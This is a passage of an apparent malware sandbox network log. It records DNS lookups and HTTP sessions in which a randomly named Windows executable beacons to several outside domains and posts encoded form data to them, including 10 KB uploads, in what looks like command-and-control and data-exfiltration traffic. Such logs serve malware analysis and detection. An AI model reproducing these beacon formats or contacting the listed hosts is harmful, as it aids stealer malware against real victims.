                Aug 19, 2024 04:29:40.700088978 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.708862066 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.714025021 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:41.714107037 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.716414928 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:41.721265078 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:43.220807076 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:43.227272987 CEST8061908104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:43.227339983 CEST6190880192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.242032051 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.247231007 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.250142097 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.254338980 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:44.259418011 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259479046 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259506941 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259555101 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259582996 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259608030 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259634018 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259680033 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:44.259706020 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:45.770188093 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:45.775615931 CEST8061909104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:45.778266907 CEST6190980192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.786793947 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.791733027 CEST8061910104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:46.791800976 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.794259071 CEST6191080192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:46.799118042 CEST8061910104.21.45.56192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Aug 19, 2024 04:26:29.468120098 CEST | 192.168.2.4 | 1.1.1.1 | 0x23e9 | Standard query (0) | www.hprlz.cz | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:26:45.256534100 CEST | 192.168.2.4 | 1.1.1.1 | 0x147a | Standard query (0) | www.catherineviskadi.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:26:58.634886026 CEST | 192.168.2.4 | 1.1.1.1 | 0x8947 | Standard query (0) | www.hatercoin.online | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:06.744618893 CEST | 192.168.2.4 | 1.1.1.1 | 0x3d79 | Standard query (0) | www.fourgrouw.cfd | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:14.896873951 CEST | 192.168.2.4 | 1.1.1.1 | 0xc8b8 | Standard query (0) | www.bfiworkerscomp.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:30.005403996 CEST | 192.168.2.4 | 1.1.1.1 | 0x3027 | Standard query (0) | www.tinmapco.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:38.068952084 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:39.067810059 CEST | 192.168.2.4 | 1.1.1.1 | 0xc23e | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:02.865473032 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b15 | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:16.225584984 CEST | 192.168.2.4 | 1.1.1.1 | 0x9fdf | Standard query (0) | www.anuts.top | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:50.818933964 CEST | 192.168.2.4 | 1.1.1.1 | 0xf202 | Standard query (0) | www.telwisey.info | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:04.193742990 CEST | 192.168.2.4 | 1.1.1.1 | 0x33ff | Standard query (0) | www.sandranoll.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:17.645778894 CEST | 192.168.2.4 | 1.1.1.1 | 0xbf8e | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:31.099773884 CEST | 192.168.2.4 | 1.1.1.1 | 0xcafa | Standard query (0) | www.helpers-lion.online | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:39.163027048 CEST | 192.168.2.4 | 1.1.1.1 | 0x93b1 | Standard query (0) | www.dmtxwuatbz.cc | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Aug 19, 2024 04:26:29.495522022 CEST | 1.1.1.1 | 192.168.2.4 | 0x23e9 | No error (0) | www.hprlz.cz | | 5.44.111.162 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:26:45.271867037 CEST | 1.1.1.1 | 192.168.2.4 | 0x147a | No error (0) | www.catherineviskadi.com | | 217.160.0.106 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:26:58.643712997 CEST | 1.1.1.1 | 192.168.2.4 | 0x8947 | Name error (3) | www.hatercoin.online | none | none | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:06.754542112 CEST | 1.1.1.1 | 192.168.2.4 | 0x3d79 | Name error (3) | www.fourgrouw.cfd | none | none | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:15.140780926 CEST | 1.1.1.1 | 192.168.2.4 | 0xc8b8 | No error (0) | www.bfiworkerscomp.com | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:30.014386892 CEST | 1.1.1.1 | 192.168.2.4 | 0x3027 | Name error (3) | www.tinmapco.com | none | none | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:27:40.632994890 CEST | 1.1.1.1 | 192.168.2.4 | 0xc23e | No error (0) | www.xn--fhq1c541j0zr.com | | 43.252.167.188 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:02.954099894 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b15 | No error (0) | www.xn--matfrmn-jxa4m.se | | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:02.954099894 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b15 | No error (0) | www.xn--matfrmn-jxa4m.se | | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:16.792520046 CEST | 1.1.1.1 | 192.168.2.4 | 0x9fdf | No error (0) | www.anuts.top | | 23.251.54.212 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:28:50.844403028 CEST | 1.1.1.1 | 192.168.2.4 | 0xf202 | No error (0) | www.telwisey.info | | 199.192.19.19 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:04.234004974 CEST | 1.1.1.1 | 192.168.2.4 | 0x33ff | No error (0) | www.sandranoll.com | | 213.145.228.16 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:17.704349995 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf8e | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
                Aug 19, 2024 04:29:17.704349995 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf8e | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:31.108858109 CEST | 1.1.1.1 | 192.168.2.4 | 0xcafa | Name error (3) | www.helpers-lion.online | none | none | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:39.175703049 CEST | 1.1.1.1 | 192.168.2.4 | 0x93b1 | No error (0) | www.dmtxwuatbz.cc | | 104.21.45.56 | A (IP address) | IN (0x0001) | false
                Aug 19, 2024 04:29:39.175703049 CEST | 1.1.1.1 | 192.168.2.4 | 0x93b1 | No error (0) | www.dmtxwuatbz.cc | | 172.67.210.102 | A (IP address) | IN (0x0001) | false
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49736 | 5.44.111.162 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:26:29.510755062 CEST | 501 | OUT | GET /w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.hprlz.cz
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:26:30.208937883 CEST | 735 | IN | HTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Mon, 19 Aug 2024 02:26:30 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 382
                Connection: close
                Location: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.4 | 49737 | 217.160.0.106 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:26:45.282705069 CEST | 790 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                Aug 19, 2024 04:26:45.953080893 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:45 GMT
                Server: Apache
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.4 | 49738 | 217.160.0.106 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:26:47.825927019 CEST | 810 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                Aug 19, 2024 04:26:48.524555922 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:48 GMT
                Server: Apache
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.4 | 49739 | 217.160.0.106 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:26:50.357610941 CEST | 10892 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH= [TRUNCATED]
                Aug 19, 2024 04:26:51.139810085 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:50 GMT
                Server: Apache
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.4 | 49741 | 217.160.0.106 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:26:52.966120958 CEST | 513 | OUT | GET /qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.catherineviskadi.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:26:53.620855093 CEST | 770 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:53 GMT
                Server: Apache
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.4 | 49742 | 208.91.197.27 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:15.151654959 CEST | 784 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.4 | 49743 | 208.91.197.27 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:17.685692072 CEST | 804 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.4 | 49744 | 208.91.197.27 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:20.219614983 CEST | 10886 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHCqTdjaH96PvIqY72xOrJ4T78xXNc6citPuA/qhfgUwp6/5b4ZAsiI3ahy2XYClsuYoLRW8GXlfFJQiRW9JBiqHKaoK6Iw9zKqdjrDW1ZFKDTWCzMqb9ndeTkbeAQuAElQInDj4sEwI7qEqQEo/40HtLR4cPECItmFJz8q2d6pU4Ll7VU2sZsAI1N9jsSxu+eTj6YbKXJv8fXXQqvG3BbGJskhF9Ve/wnRYhL+vXXqZZNGcGKVV7oYforgpXJpV3bcZ7DCMeRW7Q4foENPhAjoU1k/cFL2mm9gvpNiCf9X3hjL7s24pdlVzpUBejJjFPnHCKCLtRG8Qg2CQkZVaQe1zHyLzOMYQoYnUmTRlCeEKfq3CRh32Ny3Ni9lv8d+qKbPpzr/5XQKeEO3VWB6H0w96rKUdeKp7EoPDK2c/T03xZ9XKxqd47zb5IXLF0gw1CqvJoxn4C0BzUPdwFbrGTNJ7LEZyjUs1OgzEVCU+NYuhfr1wLdGLMIliXxTxIQ4XNR2rQzj+I1Su0kk1PiIl1P7lYqE1W8q7cpo3do02/UjfJugRn+Z3T4OqN905CBUBc40YcJjXZVlxb6yt0SulegB5Vyqw0Tkv5hbbxvtVC46sNp4Lg+/5tJTQW6EyDP5ReN2c/SOL9Qw/R9yo8Bk2QsMcpuIeWbe6f9fRkuy+olxap3NUgeloDC00V39WiomQYDqW1N+FpmL3yF9wb9tS0EzK7kFus2Mv/5VI365zo1jlEyxmNbHS04P9WqPbVzcBxdz1bCjN+OrYYRhDeL4DEjI19X+KLct1xHqmHD1cEqqeaEC7VViPP16JAXO8lYaiE6AnBA0sP [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.4 | 49745 | 208.91.197.27 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:22.796072006 CEST | 511 | OUT | GET /xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.bfiworkerscomp.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:27:24.986201048 CEST | 1236 | IN | HTTP/1.1 200 OK
                Date: Mon, 19 Aug 2024 02:27:02 GMT
                Server: Apache
                Referrer-Policy: no-referrer-when-downgrade
                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                Set-Cookie: vsid=919vr471580023843120303; expires=Sat, 18-Aug-2029 02:27:03 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XiZorF5vOo3x9HRuikJlZxbsd2Iw0GnRwg2Av4fOGSTeOfgzQWj/LlRVBakKEuPBxqte/EWKMeT+zvyX2o1/7w==
                Content-Length: 2630
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XiZorF5vOo3x9HRuikJlZxbsd2Iw0GnRwg2Av4fOGSTeOfgzQWj/LlRVBakKEuPBxqte/EWKMe
                Aug 19, 2024 04:27:24.986253023 CEST | 1236 | IN
                Data Ascii: T+zvyX2o1/7w=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=2"></sc
                Aug 19, 2024 04:27:24.986310005 CEST | 412 | IN
                Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content
                Aug 19, 2024 04:27:24.986341953 CEST | 739 | IN
                Data Ascii: ipt"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&a


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                9 | 192.168.2.4 | 61883 | 43.252.167.188 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:40.378794909 CEST | 790 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--fhq1c541j0zr.com
                Origin: http://www.xn--fhq1c541j0zr.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: lH=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                10 | 192.168.2.4 | 61884 | 43.252.167.188 | 80 | 4544 | C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 19, 2024 04:27:42.917068958 CEST | 810 | OUT | POST /rm91/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
